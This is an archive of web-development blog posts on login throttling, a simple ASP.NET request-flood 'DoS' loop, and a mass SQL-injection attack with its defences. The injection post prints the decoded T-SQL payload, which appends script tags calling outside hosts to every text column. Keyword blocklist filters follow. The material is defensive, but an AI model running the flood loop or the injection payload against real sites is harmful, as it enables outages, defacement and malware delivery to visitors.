Archive for the ‘Dos’ Tag
Prevent automated login attempts
Sometimes our websites are hit by automated login attempts from bots. We need to stop anyone from doing that against our web application, and fortunately it is very simple to do in ColdFusion. Here is the code:
<!--- Initialise the counter before it is read; the original declared it only in the failure branch,
      so the first <cfif> below would have failed on a fresh session. --->
<cfparam name="session.FailedLogin" default="0">
<cfif session.FailedLogin GT 3>
    <cfabort showerror="Sorry! Please contact the website administrator to get your password.">
</cfif>
<cfif loginsuccessfully ...>
    <!--- Login succeeded: clear the counter so a legitimate user is not locked out later. --->
    <cfset session.FailedLogin = 0>
    <!--- Write your code here --->
<cfelse>
    <cfset session.FailedLogin = session.FailedLogin + 1>
    <cfabort showerror="Invalid username or password">
</cfif>
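As an added example (not part of the original post), the same idea kept outside the session: the post's counter lives in session.FailedLogin, and a bot that never returns its session cookie starts every request with a fresh counter. The Python below (class and function names, the threshold of 3 and the 15-minute window are assumptions) counts failures per account and per source address instead:

```python
import time
from collections import defaultdict

# Added example, not from the original post: failed-login throttling kept
# server-side and keyed by (username, client IP), so a bot that discards its
# session cookie does not reset its own counter. Thresholds are assumptions.
MAX_FAILURES = 3          # same threshold the post uses (session.FailedLogin GT 3)
WINDOW_SECONDS = 15 * 60  # failures older than this are forgotten


class LoginThrottle:
    def __init__(self, now=time.time):
        self._now = now                      # injectable clock, for testing
        self._failures = defaultdict(list)   # key -> list of failure timestamps

    def _recent(self, key):
        cutoff = self._now() - WINDOW_SECONDS
        self._failures[key] = [t for t in self._failures[key] if t > cutoff]
        return self._failures[key]

    def is_blocked(self, username, ip):
        """True when either the account or the source IP exceeded the limit."""
        return (len(self._recent(("user", username))) > MAX_FAILURES
                or len(self._recent(("ip", ip))) > MAX_FAILURES)

    def record_failure(self, username, ip):
        t = self._now()
        self._failures[("user", username)].append(t)
        self._failures[("ip", ip)].append(t)

    def record_success(self, username, ip):
        # A real login clears the account counter; the IP counter is kept so a
        # bot cycling through usernames from one address is still slowed down.
        self._failures.pop(("user", username), None)


def attempt_login(throttle, username, ip, password_ok):
    """Returns 'blocked', 'ok' or 'invalid', mirroring the post's three outcomes."""
    if throttle.is_blocked(username, ip):
        return "blocked"
    if password_ok:
        throttle.record_success(username, ip)
        return "ok"
    throttle.record_failure(username, ip)
    return "invalid"
```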
Make a simple DoS attack with ASP.NET
I describe here how a simple DoS attack can be made with ASP.NET. My purpose in writing this post is not to annoy web administrators; the point is to understand how to prevent a DoS attack and how to stop one against our own website.
// Requires: using System.Net;
// A sequential loop: each iteration creates a new WebClient and issues one blocking GET.
for (int i = 0; i < 100000; i++)
{
    WebClient client = new WebClient();
    client.DownloadString("http://www.mysite.com");
}
SQL injection attacks via stored procedure
I was in a dilemma these days because our website was attacked by SQL injection, carried out by passing stored-procedure commands in a URL variable. Finally I can prevent this kind of attack against our site. The attacker appends the following stored-procedure command after the "?" in the website URL.
DECLARE @S NVARCHAR(4000)
SET @S=CAST(0x4400450043004C00 ... 6F007200 AS NVARCHAR(4000))
EXEC(@S)
DECLARE @S VARCHAR(4000)
SET @S=CAST(0x4445434C41524520 ... 736F7220 AS VARCHAR(4000))
EXEC(@S)
DECLARE @S CHAR(4000)
SET @S=CAST(0x4445434C41524520 ... 736F7220 AS CHAR(4000))
EXEC(@S)
The three variants above were injected through an HTTP GET request.
Decoding the binary string to its textual form reveals the T-SQL script below, slightly reformatted and edited for clarity. For readers unfamiliar with the syntax: the script declares a cursor over every column of a textual data type (TEXT, NTEXT, VARCHAR, NVARCHAR) in every user-defined table in the database, then appends a <script> reference to the attacker's JavaScript to the current value of each such column.
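Added example, not from the original post: a small Python helper that pulls the CAST(0x... AS type(n)) fragment out of a logged query string and decodes the hex (UTF-16LE for NVARCHAR, single-byte for VARCHAR/CHAR, as the three variants above show), then flags requests whose decoded text contains T-SQL statements. Function names and the sample query strings are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the original post. NVARCHAR/NCHAR hex is UTF-16LE
# (0x4400450043004C00 = "DECL"); VARCHAR/CHAR hex is single-byte
# (0x4445434C41524520 = "DECLARE "), matching the three variants shown above.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR|N?CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)


def decode_cast_payloads(query_string):
    """Return the decoded text of every CAST(0x..) fragment, in request order."""
    decoded = []
    text = unquote_plus(query_string)  # the fragments arrive URL-encoded
    for hexdigits, sqltype in CAST_RE.findall(text):
        if len(hexdigits) % 2:          # truncated log line: skip rather than crash
            continue
        raw = bytes.fromhex(hexdigits)
        if sqltype.upper().startswith("N"):
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def is_hex_cast_injection(query_string):
    """Flag the request when a decoded fragment contains T-SQL statements."""
    for payload in decode_cast_payloads(query_string):
        if re.search(r"\b(DECLARE|EXEC|UPDATE|CURSOR)\b", payload, re.IGNORECASE):
            return True
    return False


# Constructed samples: a harmless stand-in script, wrapped exactly like the
# NVARCHAR and VARCHAR variants above, plus a benign query string.
INNER = "DECLARE @T VARCHAR(255) SELECT @T = 'x'"
SAMPLE_N = ("id=5;DECLARE%20@S%20NVARCHAR(4000)%20SET%20@S=CAST(0x"
            + INNER.encode("utf-16-le").hex().upper()
            + "%20AS%20NVARCHAR(4000))%20EXEC(@S)")
SAMPLE_A = ("id=5;DECLARE%20@S%20VARCHAR(4000)%20SET%20@S=CAST(0x"
            + INNER.encode("latin-1").hex().upper()
            + "%20AS%20VARCHAR(4000))%20EXEC(@S)")
BENIGN = "id=5&sort=name&page=2"
```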
DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
    SELECT [A].[Name], [B].[Name]
    FROM sysobjects AS [A], syscolumns AS [B]
    WHERE [A].[ID] = [B].[ID]
      AND [A].[XType] = 'U'        /* Table (User-Defined) */
      AND ([B].[XType] = 99        /* NTEXT */
        OR [B].[XType] = 35        /* TEXT */
        OR [B].[XType] = 231       /* NVARCHAR */
        OR [B].[XType] = 167)      /* VARCHAR */
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://winzipices.cn/2.js"></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

The second variant of the loop body, which appends the reference only to rows that do not already contain it:

WHILE (@@FETCH_STATUS = 0)
BEGIN
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = [' + @C + '] + ''"></title><script src="http://abc.verynx.cn/w.js"></script><!--'' WHERE ' + @C + ' NOT LIKE ''%"></title><script src="http://abc.verynx.cn/w.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
How to Prevent Such Automated SQL Injection Attacks
<%
' Classic ASP version. URLDecode is not built in to VBScript; it is assumed to be a
' helper function defined elsewhere in the site.
Dim strQuery
strQuery = UCase(Request.ServerVariables("QUERY_STRING"))
strQuery = Replace(URLDecode(strQuery), " ", "")
If InStr(strQuery, "INSERT") > 0 OR _
   InStr(strQuery, "EXEC(") > 0 OR _
   InStr(strQuery, "SELECT") > 0 OR _
   InStr(strQuery, "UPDATE") > 0 OR _
   InStr(strQuery, "DELETE") > 0 OR _
   Len(strQuery) > 500 Then
    ' Deliberately forces a runtime error to stop the request; Response.End
    ' would stop it just as well without producing an error page.
    Response.Write 1/0
End If
%>
// Requires: using System; using System.Web;
/// <summary>
/// global.asax
/// </summary>
public class Global : System.Web.HttpApplication
{
    // ...
    // Plain substring match: legitimate values such as "castle" or "selected"
    // will also trip the filter, so tune the list for your application.
    private static string[] SQLKeywords = new string[]
    {
        "EXEC", "SELECT", "INSERT", "UPDATE", "DELETE",
        "CAST", "DECLARE", "NVARCHAR", "VARCHAR"
    };
    // ...
    protected void Application_BeginRequest(object sender, EventArgs e)
    {
        HttpContext context = HttpContext.Current;
        if (context != null)
        {
            string queryString = context.Request.ServerVariables["QUERY_STRING"];
            if (string.IsNullOrEmpty(queryString) == false)
            {
                // The original passed the whole query string into the message; the length is what it meant to report.
                if (queryString.Length > 500)
                    throw new SQLInjectionException(
                        string.Format("Unexpected 'QUERY_STRING' length ({0}).", queryString.Length));
                queryString = Server.UrlDecode(queryString);
                queryString = queryString.Replace(" ", string.Empty).ToUpper();
                foreach (string keyword in SQLKeywords)
                {
                    if (queryString.IndexOf(keyword) != (-1))
                        throw new SQLInjectionException(
                            string.Format("Unexpected T-SQL keyword ('{0}') has been detected ({1})", keyword, queryString));
                }
            }
        }
    }
    // ...
}

// SQLInjectionException is not a framework type; a minimal definition so the above compiles:
public class SQLInjectionException : Exception
{
    public SQLInjectionException(string message) : base(message) { }
}
For ColdFusion MX, put the following code in the Application.cfm file.
<cfsilent>
<!---
name: _SQLPrev.cfm
desc: Helps Prevent SQL Injection Attacks (CF5).
author: Justin D. Scott of GravityFree (jscott@gravityfree.com)
date: November 7, 2005
update: August 7, 2008
notes:

DIRECTIONS
Include this in the Application.cfm file to help prevent SQL injection attacks.
Compatible with ColdFusion 5 and may also work with ColdFusion MX. There is
an MX specific version at http://www.gravityfree.com/_sqlprev.cfm.txt.
If you update this code to be more effective, please send a copy of the changes
back to me so they can be implemented more widely.

DISCLAIMER
Justin Scott and GravityFree make no representation about the suitability or
accuracy of software or data for any purpose, and makes no warranties, either
expressed or implied, including merchantability and fitness for a particular
purpose or that the use of these software or data will not infringe any third
party patents, copyrights, trademarks, or other rights. The software and data
are provided "as is". Use at your own risk.

LICENSE
This code is hereby released into the public domain.
--->
<!--- E-Mail address for attack notifications --->
<cfparam name="request.errorEmail" default="me@yourdomain.com" />
<!--- On attack, TRUE to abort, FALSE to redirect to rootURL --->
<cfparam name="request.errorAbort" default="FALSE" />
<!--- On attack, TRUE to notify via e-mail --->
<cfparam name="request.errorNotify" default="TRUE" />
<!--- Redirection URL --->
<cfparam name="request.rootURL" default="/" />
<cfscript>
// Default to nothing.
variables.SQLPrev_Found = "";
// What are the SQL Keywords?
variables.SQLPrev_Keywords = structNew();
// Populate the structure.
structInsert(variables.SQLPrev_Keywords, "EXEC", "");
structInsert(variables.SQLPrev_Keywords, "ALTER", "");
structInsert(variables.SQLPrev_Keywords, "EXECUTE", "");
structInsert(variables.SQLPrev_Keywords, "PROC", "");
structInsert(variables.SQLPrev_Keywords, "ASC", "");
structInsert(variables.SQLPrev_Keywords, "FILE", "");
structInsert(variables.SQLPrev_Keywords, "PROCEDURE", "");
structInsert(variables.SQLPrev_Keywords, "AUTHORIZATION", "");
structInsert(variables.SQLPrev_Keywords, "BACKUP", "");
structInsert(variables.SQLPrev_Keywords, "RAISERROR", "");
structInsert(variables.SQLPrev_Keywords, "FOREIGN", "");
structInsert(variables.SQLPrev_Keywords, "FREETEXT", "");
structInsert(variables.SQLPrev_Keywords, "READTEXT", "");
structInsert(variables.SQLPrev_Keywords, "BREAK", "");
structInsert(variables.SQLPrev_Keywords, "FREETEXTTABLE", "");
structInsert(variables.SQLPrev_Keywords, "RECONFIGURE", "");
structInsert(variables.SQLPrev_Keywords, "BROWSE", "");
structInsert(variables.SQLPrev_Keywords, "REFERENCES", "");
structInsert(variables.SQLPrev_Keywords, "BULK", "");
structInsert(variables.SQLPrev_Keywords, "FULL", "");
structInsert(variables.SQLPrev_Keywords, "REPLICATION", "");
structInsert(variables.SQLPrev_Keywords, "FUNCTION", "");
structInsert(variables.SQLPrev_Keywords, "RESTORE", "");
structInsert(variables.SQLPrev_Keywords, "CASCADE", "");
structInsert(variables.SQLPrev_Keywords, "GOTO", "");
structInsert(variables.SQLPrev_Keywords, "RESTRICT", "");
structInsert(variables.SQLPrev_Keywords, "GRANT", "");
structInsert(variables.SQLPrev_Keywords, "RETURN", "");
structInsert(variables.SQLPrev_Keywords, "CHECK", "");
structInsert(variables.SQLPrev_Keywords, "GROUP", "");
structInsert(variables.SQLPrev_Keywords, "REVOKE", "");
structInsert(variables.SQLPrev_Keywords, "CHECKPOINT", "");
structInsert(variables.SQLPrev_Keywords, "HAVING", "");
structInsert(variables.SQLPrev_Keywords, "RIGHT", "");
structInsert(variables.SQLPrev_Keywords, "CLOSE", "");
structInsert(variables.SQLPrev_Keywords, "HOLDLOCK", "");
structInsert(variables.SQLPrev_Keywords, "ROLLBACK", "");
structInsert(variables.SQLPrev_Keywords, "CLUSTERED", "");
structInsert(variables.SQLPrev_Keywords, "IDENTITY", "");
structInsert(variables.SQLPrev_Keywords, "ROWCOUNT", "");
structInsert(variables.SQLPrev_Keywords, "COALESCE", "");
structInsert(variables.SQLPrev_Keywords, "IDENTITY_INSERT", "");
structInsert(variables.SQLPrev_Keywords, "ROWGUIDCOL", "");
structInsert(variables.SQLPrev_Keywords, "COLLATE", "");
structInsert(variables.SQLPrev_Keywords, "IDENTITYCOL", "");
structInsert(variables.SQLPrev_Keywords, "COLUMN", "");
structInsert(variables.SQLPrev_Keywords, "COMMIT", "");
structInsert(variables.SQLPrev_Keywords, "SCHEMA", "");
structInsert(variables.SQLPrev_Keywords, "COMPUTE", "");
structInsert(variables.SQLPrev_Keywords, "INDEX", "");
structInsert(variables.SQLPrev_Keywords, "SELECT", "");
structInsert(variables.SQLPrev_Keywords, "CONSTRAINT", "");
structInsert(variables.SQLPrev_Keywords, "INNER", "");
structInsert(variables.SQLPrev_Keywords, "SESSION_USER", "");
structInsert(variables.SQLPrev_Keywords, "CONTAINS", "");
structInsert(variables.SQLPrev_Keywords, "INSERT", "");
structInsert(variables.SQLPrev_Keywords, "SET", "");
structInsert(variables.SQLPrev_Keywords, "CONTAINSTABLE", "");
structInsert(variables.SQLPrev_Keywords, "INTERSECT", "");
structInsert(variables.SQLPrev_Keywords, "SETUSER", "");
structInsert(variables.SQLPrev_Keywords, "CONTINUE", "");
structInsert(variables.SQLPrev_Keywords, "INTO", "");
structInsert(variables.SQLPrev_Keywords, "SHUTDOWN", "");
structInsert(variables.SQLPrev_Keywords, "CONVERT", "");
structInsert(variables.SQLPrev_Keywords, "CREATE", "");
structInsert(variables.SQLPrev_Keywords, "JOIN", "");
structInsert(variables.SQLPrev_Keywords, "STATISTICS", "");
structInsert(variables.SQLPrev_Keywords, "CROSS", "");
structInsert(variables.SQLPrev_Keywords, "KEY", "");
structInsert(variables.SQLPrev_Keywords, "SYSTEM_USER", "");
structInsert(variables.SQLPrev_Keywords, "CURRENT", "");
structInsert(variables.SQLPrev_Keywords, "KILL", "");
structInsert(variables.SQLPrev_Keywords, "TABLE", "");
structInsert(variables.SQLPrev_Keywords, "CURRENT_DATE", "");
structInsert(variables.SQLPrev_Keywords, "LEFT", "");
structInsert(variables.SQLPrev_Keywords, "TEXTSIZE", "");
structInsert(variables.SQLPrev_Keywords, "CURRENT_TIME", "");
structInsert(variables.SQLPrev_Keywords, "LIKE", "");
structInsert(variables.SQLPrev_Keywords, "THEN", "");
structInsert(variables.SQLPrev_Keywords, "CURRENT_TIMESTAMP", "");
structInsert(variables.SQLPrev_Keywords, "LINENO", "");
structInsert(variables.SQLPrev_Keywords, "CURRENT_USER", "");
structInsert(variables.SQLPrev_Keywords, "LOAD", "");
structInsert(variables.SQLPrev_Keywords, "TOP", "");
structInsert(variables.SQLPrev_Keywords, "CURSOR", "");
structInsert(variables.SQLPrev_Keywords, "NATIONAL", "");
structInsert(variables.SQLPrev_Keywords, "TRAN", "");
structInsert(variables.SQLPrev_Keywords, "DATABASE", "");
structInsert(variables.SQLPrev_Keywords, "NOCHECK", "");
structInsert(variables.SQLPrev_Keywords, "TRANSACTION", "");
structInsert(variables.SQLPrev_Keywords, "DBCC", "");
structInsert(variables.SQLPrev_Keywords, "NONCLUSTERED", "");
structInsert(variables.SQLPrev_Keywords, "TRIGGER", "");
structInsert(variables.SQLPrev_Keywords, "DEALLOCATE", "");
structInsert(variables.SQLPrev_Keywords, "TRUNCATE", "");
structInsert(variables.SQLPrev_Keywords, "DECLARE", "");
structInsert(variables.SQLPrev_Keywords, "NULL", "");
structInsert(variables.SQLPrev_Keywords, "TSEQUAL", "");
structInsert(variables.SQLPrev_Keywords, "DEFAULT", "");
structInsert(variables.SQLPrev_Keywords, "NULLIF", "");
structInsert(variables.SQLPrev_Keywords, "UNION", "");
structInsert(variables.SQLPrev_Keywords, "DELETE", "");
structInsert(variables.SQLPrev_Keywords, "UNIQUE", "");
structInsert(variables.SQLPrev_Keywords, "DENY", "");
structInsert(variables.SQLPrev_Keywords, "OFF", "");
structInsert(variables.SQLPrev_Keywords, "UPDATE", "");
structInsert(variables.SQLPrev_Keywords, "DESC", "");
structInsert(variables.SQLPrev_Keywords, "OFFSETS", "");
structInsert(variables.SQLPrev_Keywords, "UPDATETEXT", "");
structInsert(variables.SQLPrev_Keywords, "DISK", "");
structInsert(variables.SQLPrev_Keywords, "USE", "");
structInsert(variables.SQLPrev_Keywords, "DISTINCT", "");
structInsert(variables.SQLPrev_Keywords, "OPEN", "");
structInsert(variables.SQLPrev_Keywords, "USER", "");
structInsert(variables.SQLPrev_Keywords, "DISTRIBUTED", "");
structInsert(variables.SQLPrev_Keywords, "OPENDATASOURCE", "");
structInsert(variables.SQLPrev_Keywords, "VALUES", "");
structInsert(variables.SQLPrev_Keywords, "DOUBLE", "");
structInsert(variables.SQLPrev_Keywords, "OPENQUERY", "");
structInsert(variables.SQLPrev_Keywords, "VARYING", "");
structInsert(variables.SQLPrev_Keywords, "DROP", "");
structInsert(variables.SQLPrev_Keywords, "OPENROWSET", "");
structInsert(variables.SQLPrev_Keywords, "VIEW", "");
structInsert(variables.SQLPrev_Keywords, "DUMMY", "");
structInsert(variables.SQLPrev_Keywords, "OPENXML", "");
structInsert(variables.SQLPrev_Keywords, "WAITFOR", "");
structInsert(variables.SQLPrev_Keywords, "DUMP", "");
structInsert(variables.SQLPrev_Keywords, "OPTION", "");
structInsert(variables.SQLPrev_Keywords, "WHEN", "");
structInsert(variables.SQLPrev_Keywords, "WHERE", "");
structInsert(variables.SQLPrev_Keywords, "END", "");
structInsert(variables.SQLPrev_Keywords, "ORDER", "");
structInsert(variables.SQLPrev_Keywords, "WHILE", "");
structInsert(variables.SQLPrev_Keywords, "ERRLVL", "");
structInsert(variables.SQLPrev_Keywords, "OUTER", "");
structInsert(variables.SQLPrev_Keywords, "WITH", "");
structInsert(variables.SQLPrev_Keywords, "ESCAPE", "");
structInsert(variables.SQLPrev_Keywords, "OVER", "");
structInsert(variables.SQLPrev_Keywords, "WRITETEXT", "");
// Now check through the URL variables for possible SQL attacks.
for (SQLPrev_Index1 in URL) {
    // Bring in the URL value.
    variables.SQLPrev_Value = URL[SQLPrev_Index1];
    // Find any of the keywords in this value. A value only counts as an attack
    // when a keyword and a ";" statement separator both appear in it.
    for (SQLPrev_Index2 in variables.SQLPrev_Keywords) {
        if (findNoCase(SQLPrev_Index2, variables.SQLPrev_Value) and find(";", variables.SQLPrev_Value)) {
            variables.SQLPrev_Found = "sql";
        }
    }
}
// Kill the temp struct with the SQL keywords.
structClear(variables.SQLPrev_Keywords);
</cfscript>
<!--- Did we find anything? --->
<cfif len(variables.SQLPrev_Found)>
    <!--- E-Mail the error for tracking. --->
    <cfif request.errorNotify>
        <cfmail to="#request.errorEmail#" from="#request.errorEmail#" subject="SQL Injection Attempt" type="HTML">
            <p>Date: #now()#</p>
            <p>Site: #cgi.server_name#</p>
            <p>URL: #cgi.script_name#?#cgi.query_string#</p>
            <p>IP: #cgi.remote_addr#</p>
            <cfdump var="#url#">
            <cfdump var="#variables#">
        </cfmail>
    </cfif>
    <!--- Abort or redirect to home. --->
    <cfif request.ErrorAbort>
        <cfabort>
    <cfelse>
        <cflocation url="#request.rootURL#" addtoken="no">
    </cfif>
</cfif>
</cfsilent>